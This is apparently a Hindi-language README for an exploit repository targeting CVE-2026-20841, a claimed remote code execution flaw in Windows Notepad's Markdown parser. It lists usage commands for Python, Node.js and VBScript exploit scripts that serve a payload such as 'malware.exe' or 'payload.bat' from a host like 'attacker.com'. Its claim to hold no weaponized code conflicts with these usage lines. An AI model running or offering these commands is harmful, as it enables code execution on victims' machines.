
CVE-2026-20841
सुरक्षा अनुसंधान और तकनीकी विश्लेषण रिपॉजिटरी
⚠️ यह रिपॉजिटरी केवल शैक्षिक, रक्षात्मक और अनुसंधान उद्देश्यों के लिए है।
CVE-2026-20841 एक गंभीर दूरस्थ कोड निष्पादन (RCE) कमजोरी है जो माइक्रोसॉफ्ट विंडोज नोटपैड की Markdown प्रसंस्करण कार्यक्षमता को प्रभावित करती है।
एक हमलावर एक विशेष रूप से तैयार की गई फ़ाइल को विंडोज नोटपैड के एक कमजोर संस्करण द्वारा खोले जाने पर मनमाना कोड निष्पादन को ट्रिगर कर सकता है।
| उत्पाद | स्थिति |
|---|---|
| Windows 11 Notepad | असुरक्षित |
| Windows 10 Notepad | असुरक्षित |
| अद्यतन/पैच किए गए संस्करण | सुरक्षित |
python CVE-2026-20841.py 192.168.1.100 80 malware.exe
Node.js संस्करण
node CVE-2026-20841.js <host> <port> <payload-filename>
उदाहरण:
node CVE-2026-20841.js attacker.com 445 payload.bat
VBScript संस्करण (Windows Native)
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>
उदाहरण:
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe
यह कमजोरी विंडोज नोटपैड की Markdown सामग्री हैंडलिंग कार्यक्षमता में मौजूद है।
एक विशेष रूप से तैयार की गई फ़ाइल को खोलने से असुरक्षित मेमोरी संचालन ट्रिगर हो सकते हैं जो वर्तमान उपयोगकर्ता के संदर्भ में मनमाना कोड निष्पादन का कारण बन सकते हैं।
Attacker
│
▼
Crafted Markdown File
│
▼
Victim Opens File
│
▼
Vulnerable Markdown Parser
│
▼
Memory Corruption
│
▼
Code Execution
OS : Windows 11
Application : Notepad
Architecture: x64
Debugger : WinDbg
Analysis : Static + Dynamic
इस रिपॉजिटरी में शस्त्रीकृत शोषण कोड नहीं है।
प्रदान की गई जानकारी केवल इसके लिए है:
उपयोगकर्ता सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए जिम्मेदार हैं।
साइबरसुरक्षा अनुसंधान • कमजोरी विश्लेषण • रक्षात्मक सुरक्षा
| फ़ील्ड | मान |
|---|
| CVE | CVE-2026-20841 |
| प्रकार | दूरस्थ कोड निष्पादन |
| हमला वेक्टर | तैयार की गई फ़ाइल |
| उपयोगकर्ता इंटरैक्शन | आवश्यक |
| आवश्यक विशेषाधिकार | कोई नहीं |
| गंभीरता | गंभीर |
| विक्रेता | Microsoft |